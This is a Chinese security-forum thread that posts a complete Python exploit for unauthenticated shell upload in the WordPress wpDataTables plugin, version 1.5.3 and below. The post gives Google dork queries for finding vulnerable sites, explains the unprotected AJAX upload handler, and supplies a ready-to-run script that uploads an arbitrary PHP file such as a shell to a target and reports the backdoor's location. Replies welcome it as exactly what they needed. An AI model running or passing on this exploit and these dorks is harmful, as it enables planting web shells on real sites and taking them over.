查看: 9792|回复: 4

wordpress wpDataTables 1.5.3 and below Unauthenticated Shell Upload

[复制链接]
  • TA的每日心情
    慵懒
    2022-4-16 15:45
  • 签到天数: 247 天

    [LV.8]以坛为家I

    发表于 2015-1-11 13:44:58 | 显示全部楼层 |阅读模式
    谷歌关键字如下:

    inurl:/plugins/wpdatatables
    inurl:codecanyon-3958969
    index of "wpdatatables"
    index of "codecanyon-3958969"

    exp 如下:
    [Python] 纯文本查看 复制代码
    #!/usr/bin/python
    #
    # Exploit Name: Wordpress wpDataTables 1.5.3 and below Unauthenticated Shell Upload Vulnerability
    # 
    # Vulnerability discovered by Claudio Viviani
    #
    # Date : 2014-11-22
    #
    # Exploit written by Claudio Viviani
    #
    # Video Demo: [url]http://www.youtube.com/watch?v=44m4VNpeEVc[/url]
    #
    # --------------------------------------------------------------------
    #
    # Issue n.1 (wpdatatables.php)
    #
    # This function is always available without wpdatatables edit permission:
    #
    #    function wdt_upload_file(){
    #        require_once(PDT_ROOT_PATH.'lib/upload/UploadHandler.php');
    #        $uploadHandler = new UploadHandler();
    #        exit();
    #    }
    #    ...
    #    ...
    #    ...
    #    add_action( 'wp_ajax_wdt_upload_file', 'wdt_upload_file' );
    #    add_action( 'wp_ajax_nopriv_wdt_upload_file', 'wdt_upload_file' );
    # 
    #
    # Issue n.2 (lib/upload/UploadHandler.php)
    #
    # This php script allows you to upload any type of file
    #
    # ---------------------------------------------------------------------
    #
    # Dork google:  inurl:/plugins/wpdatatables
    #               inurl:codecanyon-3958969
    #               index of "wpdatatables"
    #               index of "codecanyon-3958969"
    #
    # Tested on BackBox 3.x
    #
    #
    # http connection
    import urllib, urllib2, sys, re
    # Args management
    import optparse
    # file management
    import os, os.path
    
    # Check url
    def checkurl(url):
        if url[:8] != "http://" and url[:7] != "http://":
            print('[X] You must insert http:// or http:// procotol')
            sys.exit(1)
        else:
            return url
    
    # Check if file exists and has readable
    def checkfile(file):
        if not os.path.isfile(file) and not os.access(file, os.R_OK):
            print '[X] '+file+' file is missing or not readable'
            sys.exit(1)
        else:
            return file
    
    # Create multipart header
    def create_body_sh3ll_upl04d(payloadname):
    
       getfields = dict()
    
       payloadcontent = open(payloadname).read()
    
       LIMIT = '----------lImIt_of_THE_fIle_eW_$'
       CRLF = '\r\n'
    
       L = []
       for (key, value) in getfields.items():
          L.append('--' + LIMIT)
          L.append('Content-Disposition: form-data; name="%s"' % key)
          L.append('')
          L.append(value)
    
       L.append('--' + LIMIT)
       L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', payloadname))
       L.append('Content-Type: application/force-download')
       L.append('')
       L.append(payloadcontent)
       L.append('--' + LIMIT + '--')
       L.append('')
       body = CRLF.join(L)
       return body
    
    banner = """
       ___ ___               __                                                         
      |   Y   .-----.----.--|  .-----.----.-----.-----.-----.                           
      |.  |   |  _  |   _|  _  |  _  |   _|  -__|__ --|__ --|                           
      |. / \  |_____|__| |_____|   __|__| |_____|_____|_____|                           
      |:      |                |__|                                                     
      |::.|:. |                                                                         
      `--- ---'                                                                         
             ___ ___       ______         __         _______       __    __                
            |   Y   .-----|   _  \ .---.-|  |_.---.-|       .---.-|  |--|  .-----.-----.   
            |.  |   |  _  |.  |   \|  _  |   _|  _  |.|   | |  _  |  _  |  |  -__|__ --|   
            |. / \  |   __|.  |    |___._|____|___._`-|.  |-|___._|_____|__|_____|_____|   
            |:      |__|  |:  1    /                  |:  |                                
            |::.|:. |     |::.. . /                   |::.|                                
            `--- ---'     `------'                    `---'                                
                                                     
                                                            Sh311 Upl04d Vuln3r4b1l1ty 
                                                                    <= 1.5.3
    
                                       Written by:
    
                                     Claudio Viviani
    
                                  [url]http://www.homelab.it[/url]
    
                                     [email]info@homelab.it[/email]
                                 [email]homelabit@protonmail.ch[/email]
    
                            [url]http://www.facebook.com/homelabit[/url]
                              [url]http://twitter.com/homelabit[/url]
                              [url]http://plus.google.com/+HomelabIt1/[/url]
                   [url]http://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww[/url]
    """
    
    commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME.PHP [--timeout sec]')
    commandList.add_option('-t', '--target', action="store",
                      help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                      )
    commandList.add_option('-f', '--file', action="store",
                      help="Insert file name, ex: shell.php",
                      )
    commandList.add_option('--timeout', action="store", default=10, type="int",
                      help="[Timeout Value] - Default 10",
                      )
    
    options, remainder = commandList.parse_args()
    
    # Check args
    if not options.target or not options.file:
        print(banner)
        commandList.print_help()
        sys.exit(1)
    
    payloadname = checkfile(options.file)
    host = checkurl(options.target)
    timeout = options.timeout
    
    print(banner)
    
    url_wpdatatab_upload = host+'/wp-admin/admin-ajax.php?action=wdt_upload_file'
    
    content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'
    
    bodyupload = create_body_sh3ll_upl04d(payloadname)
    
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
               'content-type': content_type,
               'content-length': str(len(bodyupload)) }
    
    try:
       req = urllib2.Request(url_wpdatatab_upload, bodyupload, headers)
       response = urllib2.urlopen(req)
    
       read = response.read()
    
       if "error" in read or read == "0":
          print("[X] Upload Failed :(")
       else:
          backdoor_location = re.compile('\"url\":\"(.*?)\",\"').search(read).group(1)
          print("[!] Shell Uploaded")
          print("[!] Location: "+backdoor_location.replace("\\",""))
    except urllib2.HTTPError as e:
       print("[X] Http Error: "+str(e))
    except urllib2.URLError as e:
       print("[X] Connection Error: "+str(e))
    回复

    使用道具 举报

  • TA的每日心情
    无聊
    2015-11-10 08:58
  • 签到天数: 12 天

    [LV.3]偶尔看看II

    发表于 2015-1-11 14:29:35 | 显示全部楼层
    刚在wooyun看到。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2016-9-21 14:45
  • 签到天数: 4 天

    [LV.2]偶尔看看I

    发表于 2015-1-14 16:40:53 | 显示全部楼层
    正需要。
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-23 05:21 , Processed in 0.025674 second(s), 17 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部